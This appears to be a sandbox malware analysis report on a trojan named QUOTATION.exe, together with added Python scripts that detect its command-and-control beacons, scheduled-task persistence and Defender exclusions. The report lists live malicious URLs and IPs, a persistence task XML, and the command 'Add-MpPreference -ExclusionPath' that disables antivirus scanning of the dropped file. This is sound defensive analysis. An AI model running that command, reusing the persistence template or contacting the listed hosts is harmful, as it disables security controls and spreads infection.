http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX | 100% | Avira URL Cloud | malware
www.purelai.store/p2r0/ | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
purelai.store | 208.51.62.42 | true | true | | unknown
www.archedbeautynw.com | 192.185.0.218 | true | false | | unknown
www.purelai.store | unknown | unknown | true | | unknown

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX | true | Avira URL Cloud: malware | unknown
www.purelai.store/p2r0/ | true | Avira URL Cloud: malware | low

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1L | NETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp; QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp | false | | high
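The same /p2r0/ path token shows up on two hosts in the tables above (www.purelai.store, and wildcard.hostgator.com in NETSTAT.EXE's memory): FormBook walks a list of domains with one fixed path and query layout, so a block on the contacted domain alone misses the rotation. The Python below is an added detection example, not something the report or the sandbox ships. It flags URLs with the observed shape in a constructed proxy log and clusters hits by source host and path token. The path regex, the query alphabet and the length thresholds are assumptions generalised from these two URLs and should be tuned against real traffic before alerting; a short path with one long base64 value will also match some legitimate APIs.

```python
"""Flag FormBook-style check-in URLs in a proxy log and cluster them by path token.

Added example, not taken from the report. Regexes and thresholds are
assumptions generalised from the two beacon URLs in this analysis.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")          # e.g. /p2r0/
KEY_RE = re.compile(r"^[A-Za-z0-9]{2,8}$")           # e.g. U2JXS, cH
VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")        # base64 / url-safe alphabet only
MIN_PAYLOAD = 12   # shortest first-parameter value still treated as a beacon payload
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def _split(url: str):
    return urlsplit(url if "://" in url else "http://" + url)


def _query_pairs(query: str):
    # Deliberately not urllib's parse_qsl: it turns '+' into a space and would
    # break the alphabet check on values such as kHZbGirW+rtif...
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def is_formbook_beacon(url: str) -> bool:
    """True when the URL has the path/query shape of a FormBook check-in."""
    u = _split(url)
    if not PATH_RE.match(u.path):
        return False
    pairs = _query_pairs(u.query)
    if not 1 <= len(pairs) <= 2:
        return False
    key1, val1 = pairs[0]
    if not (KEY_RE.match(key1) and VALUE_RE.match(val1) and len(val1) >= MIN_PAYLOAD):
        return False
    if len(pairs) == 2:           # optional short second parameter, e.g. cH=-ZeTxXnX
        key2, val2 = pairs[1]
        if not (KEY_RE.match(key2) and VALUE_RE.match(val2) and len(val2) <= MIN_PAYLOAD):
            return False
    return True


def scan_proxy_log(lines):
    """Group beacon hits by (source host, path token) so rotated C2 domains land in one cluster."""
    clusters = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m and is_formbook_beacon(m["url"]):
            u = _split(m["url"])
            clusters[(m["src"], u.path)].add(u.hostname)
    return {key: sorted(hosts) for key, hosts in clusters.items()}


# Constructed proxy log: the two URLs from this report plus benign traffic.
SAMPLE_LOG = [
    "2021-12-02T19:55:01Z 10.0.0.5 GET http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX 200",
    "2021-12-02T19:55:40Z 10.0.0.5 GET https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1L 404",
    "2021-12-02T19:56:00Z 10.0.0.5 GET https://www.microsoft.com/en-us/ 200",
    "2021-12-02T19:56:10Z 10.0.0.7 GET https://example.com/api/?q=test 200",
    "2021-12-02T19:56:20Z 10.0.0.7 GET https://cdn.example.net/img/?v=1638408262 200",
]

if __name__ == "__main__":
    for (src, path), hosts in scan_proxy_log(SAMPLE_LOG).items():
        print(f"{src} beacons to path {path} on {len(hosts)} host(s): {', '.join(hosts)}")
```

The bare www.purelai.store/p2r0/ entry (the POST target) is intentionally not matched on its own, since a short path without the query is too common; once a GET beacon has been seen from a host, cluster on that host's path token to catch the POSTs and the other domains in the rotation.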

                  Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.51.62.42 | purelai.store | United States | 17139 | NETRANGEUS | true

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:532906
                  Start date:02.12.2021
                  Start time:19:53:41
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 40s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:QUOTATION.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:36
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@17/8@2/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 18.4% (good quality ratio 16.4%)
                  • Quality average: 72.9%
                  • Quality standard deviation: 31.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 84
                  • Number of non-executed functions: 169
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

Time | Type | Description
19:54:32 | API Interceptor | 1x Sleep call for process: QUOTATION.exe modified
19:54:36 | API Interceptor | 40x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
NETRANGEUS | z0x3n.x86-20211110-2150 | (hash via report link) | malicious | 173.247.233.114
NETRANGEUS | https://bootsonagmvhhy.storage.googleapis.com/bootsizitvhjeo.html#qs=r-abacaecgjgkeacaefbicababacagbacfcaccakjbackbfahebejacb | (hash via report link) | malicious | 208.51.63.170

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION.exe.log
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):1310
                  Entropy (8bit):5.345651901398759
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                  MD5:D918C6A765EDB90D2A227FE23A3FEC98
                  SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                  SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                  SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22272
                  Entropy (8bit):5.602934150606012
                  Encrypted:false
                  SSDEEP:384:vtCDLC0ma0M1D93bD3RYSBKnMjultI+77Y9g9SJ3xOT1Ma7ZlbAV79W07a5ZBDIL:QlBRu4KMClthf9cUCafw5iVA
                  MD5:590EFBC148FE68AA56C46E9E0FF3D7F0
                  SHA1:2690E695521BFA00E6989969BC9FB0F97E493A40
                  SHA-256:76F88D68E1EA3A3ACD8D130BDDCD5BB271D687693FE920AE14F5DE3A51453511
                  SHA-512:8AAA5F6D4B3AC305D3C0C984667BDC2805CBA4F53A51052589FBFA615BB1EE05CE82891919B57FE5214735DA8A41CE1EDD33BEDE40FFB13AE9F350A7613A93A5
                  Malicious:false
                  Preview: @...e...........y.......h.s...............J..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nyncxzs.h2v.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oorirpyr.0hv.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:XML 1.0 document, ASCII text
                  Category:dropped
                  Size (bytes):1600
                  Entropy (8bit):5.152736432421442
                  Encrypted:false
                  SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtETxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTqv
                  MD5:3CE40204A917DE9C82B360734EE652AA
                  SHA1:78B42098FA8623993EF52FEAFC39CC252BBEB99F
                  SHA-256:99E8226821AC5FF2A5871E172ED6501E3D291329979B9B81850DE9718A24898E
                  SHA-512:52B54CAD11E53A99187BC9A81C5373BEC09D0E6D2A089476B08EEE3C08A75D7632AC0571CE506DEA502A021E1B94267807E6F7A93B8D902AC50B644CE763B029
                  Malicious:true
                  Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                  C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):684032
                  Entropy (8bit):7.840372839503771
                  Encrypted:false
                  SSDEEP:12288:08wTa6ognvmGIhhzDliENR+jr2UqHblHnxAEONziF7rCAoNc+2ZYSkB:lEROGQzPNRErGJHpSzryTZ7M
                  MD5:213D8FD4B74E3B1122CFC1A9159AA579
                  SHA1:3FCEA21CA260C922F371877BEF1CEC0B2293F1E9
                  SHA-256:696BA286FA1D2D46B09DEE92733F9CA34BFE3E58F50A440A3EC89F63BBA76441
                  SHA-512:63E80F3DB6DD6130E20010841BE8C6449974FF7DA333BC692AC2F226A12339E7A6B79111CFBB6A5FB3E73D8FF6C2653E2CA664CA1347B04FC639ABB18C94C0A9
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 18%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F .a..............0..d.............. ........@.. ....................................@.................................x...O.......@............................................................................ ............... ..H............text....b... ...d.................. ..`.rsrc...@............f..............@..@.reloc...............n..............@..B........................H.......p>...F......Z...@...8............................................0..7..........=...%....r...p.......%.r...p.%.r9..p.%...(......+..*".(.....*&.(......**..(......*....(......*....(......*....0............d.......{......o.......+..*....0..3.........{....s.......o......(I.....,..rK..psO...z..}....*..0............o......0..o......0..o.....2..o.......+....,..r...pr...ps....z.o.......o....ZX..{...........,..r5..ps....z..{....o.....+_..( .........oL...........,B..{.......s/..
                  C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe:Zone.Identifier
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\Documents\20211202\PowerShell_transcript.609290.OySUyLIk.20211202195435.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5801
                  Entropy (8bit):5.412304632720399
                  Encrypted:false
                  SSDEEP:96:BZ2hONGqDo1Z6Z2hONGqDo1ZVt31jZThONGqDo1ZxV8FFBZK:Sl
                  MD5:D457A5A89526EB2350FDE3583929DE9B
                  SHA1:450067DCFCB07C3E3B2F63067C9D83E0268BB9EC
                  SHA-256:B563FCC5EF242AFB3A95F52F69B4036FCFBFA64AAE1097F162A8D6EA59C55AA2
                  SHA-512:27D8CCE47162FB100FD3A48E0BCBE935F8333A149E4E0B2E8976DAA1BCF4AB86D39671B6A9162DAE0129FD2AE5F395D35FC261BF27F3EB35F7DE55D2C11B15C8
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202195436..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 609290 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe..Process ID: 7120..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202195436..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe..**********************..Windows PowerShell transcript start..Start time: 20211202195810..Username: computer\user..RunAs User: DESKTOP-716T77
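Two of the dropped artefacts above are worth scripting against because they are the persistence and evasion steps in plain text: the scheduled-task XML (tmp8E88.tmp) that schtasks.exe registers, and the PowerShell transcript recording "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe". The Python below is an added triage example, not part of the report. TASK_XML is reconstructed from the fields visible in the tmp8E88.tmp preview; the preview is cut off before the <Actions> element, so the Exec target is an assumption (the dropped lQdAGavApIJoo.exe, which is also the path excluded from Defender). TRANSCRIPT is trimmed from the transcript preview. Both inputs are constructed for the example.

```python
"""Triage a dropped scheduled-task XML and a PowerShell transcript for
user-level persistence and Defender exclusions.

Added example, not from the report. TASK_XML's <Actions> element is an
assumption; the rest of both inputs is reconstructed from the report's previews.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\", re.I)
DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+(\S+)", re.I)

TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>computer\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled><UserId>computer\\user</UserId></LogonTrigger>
    <RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>computer\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\user\\AppData\\Roaming\\lQdAGavApIJoo.exe</Command></Exec>
  </Actions>
</Task>"""

TRANSCRIPT = """**********************
Windows PowerShell transcript start
Start time: 20211202195436
Username: computer\\user
Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\lQdAGavApIJoo.exe
Process ID: 7120
**********************
PS>Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\lQdAGavApIJoo.exe
"""


def _text(root, path):
    node = root.find(path, TASK_NS)
    return (node.text or "").strip() if node is not None else ""


def parse_task(xml_text: str):
    # The dropped file declares encoding="UTF-16" but its bytes are ASCII (the report
    # types it "XML 1.0 document, ASCII text"); drop the declaration and parse what is there.
    return ET.fromstring(DECL_RE.sub("", xml_text, count=1).lstrip())


def triage_task(xml_text: str, dropped_at: str) -> dict:
    """Findings that make a user-level scheduled task worth a look. dropped_at is ISO 8601."""
    root = parse_task(xml_text)
    logon = _text(root, "t:Triggers/t:LogonTrigger/t:Enabled").lower() == "true"
    run_level = _text(root, "t:Principals/t:Principal/t:RunLevel")
    logon_type = _text(root, "t:Principals/t:Principal/t:LogonType")
    command = _text(root, "t:Actions/t:Exec/t:Command")
    registered = datetime.fromisoformat(_text(root, "t:RegistrationInfo/t:Date")[:19])
    findings = []
    if logon:
        findings.append("logon trigger enabled: re-runs at every sign-in of the user")
    if USER_WRITABLE.match(command):
        findings.append(f"action runs from a user-writable path: {command}")
    if datetime.fromisoformat(dropped_at) - registered > timedelta(days=365):
        findings.append(f"registration date {registered.date()} is over a year older than the file (hard-coded template value)")
    if run_level == "LeastPrivilege" and logon_type == "InteractiveToken":
        findings.append("LeastPrivilege + InteractiveToken: no UAC prompt, persists in user context")
    return {"logon_trigger": logon, "run_level": run_level, "command": command, "findings": findings}


def defender_exclusions(transcript: str):
    """Unique (kind, value, user_writable) for every Add-MpPreference exclusion in a transcript."""
    seen = {}
    for m in EXCLUSION_RE.finditer(transcript):
        kind, value = m.group(1), m.group(2).strip("\"'")
        seen[(kind, value)] = bool(USER_WRITABLE.match(value))
    return [(k, v, w) for (k, v), w in seen.items()]


if __name__ == "__main__":
    for finding in triage_task(TASK_XML, "2021-12-02T19:54:00")["findings"]:
        print("task:", finding)
    for kind, value, writable in defender_exclusions(TRANSCRIPT):
        print(f"defender exclusion ({kind}): {value}  user-writable={writable}")
```

The registration-date check is the one most people skip: the task XML carries 2014-10-25 while the file was dropped on 2021-12-02, which is the kind of hard-coded template value that a search for "tasks registered today" would miss. The transcript parser is deliberately case-insensitive and accepts -ExclusionProcess and -ExclusionExtension as well, since the same PowerShell-based Defender tampering appears with all three.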

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.840372839503771
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:QUOTATION.exe
                  File size:684032
                  MD5:213d8fd4b74e3b1122cfc1a9159aa579
                  SHA1:3fcea21ca260c922f371877bef1cec0b2293f1e9
                  SHA256:696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
                  SHA512:63e80f3db6dd6130e20010841be8c6449974ff7da333bc692ac2f226a12339e7a6b79111cfbb6a5fb3e73d8ff6c2653e2ca664ca1347b04fc639abb18c94c0a9
                  SSDEEP:12288:08wTa6ognvmGIhhzDliENR+jr2UqHblHnxAEONziF7rCAoNc+2ZYSkB:lEROGQzPNRErGJHpSzryTZ7M
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F .a..............0..d............... ........@.. ....................................@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x4a82ca
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61A82046 [Thu Dec 2 01:24:22 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(the remaining bytes are zero padding, disassembled as "add byte ptr [eax], al" repeated)

The native entrypoint is the standard CLR launcher stub: one jmp through the IAT entry at RVA 0x2000 (the only native import of a managed executable, mscoree.dll!_CorExeMain). All code of interest is managed IL inside the packed .text section, so analysis starts with a .NET decompiler or unpacker rather than a native disassembler.

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa8278 | 0x4f | .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x640 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x2000 | 0xa62d0 | 0xa6400 | False | 0.913712993421 | data | 7.84988973797 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc | 0xaa000 | 0x640 | 0x800 | False | 0.34619140625 | data | 3.51366794109 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0xac000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  RT_VERSION | 0xaa090 | 0x3b0 | data | |
                  RT_MANIFEST | 0xaa450 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                  Imports

                  DLL | Import
                  mscoree.dll | _CorExeMain

                  Version Infos

                  Description | Data
                  Translation | 0x0000 0x04b0
                  LegalCopyright | Copyright Mogens Heller Grabe 2010
                  Assembly Version | 1.0.0.0
                  InternalName | AppDomainInitializerIn.exe
                  FileVersion | 1.0.0.0
                  CompanyName | Mookid8000
                  LegalTrademarks |
                  Comments |
                  ProductName | TypedFactoryTjek
                  ProductVersion | 1.0.0.0
                  FileDescription | TypedFactoryTjek
                  OriginalFilename | AppDomainInitializerIn.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Dec 2, 2021 19:55:56.321921110 CET | 49786 | 80 | 192.168.2.3 | 208.51.62.42
                  Dec 2, 2021 19:55:56.511965990 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
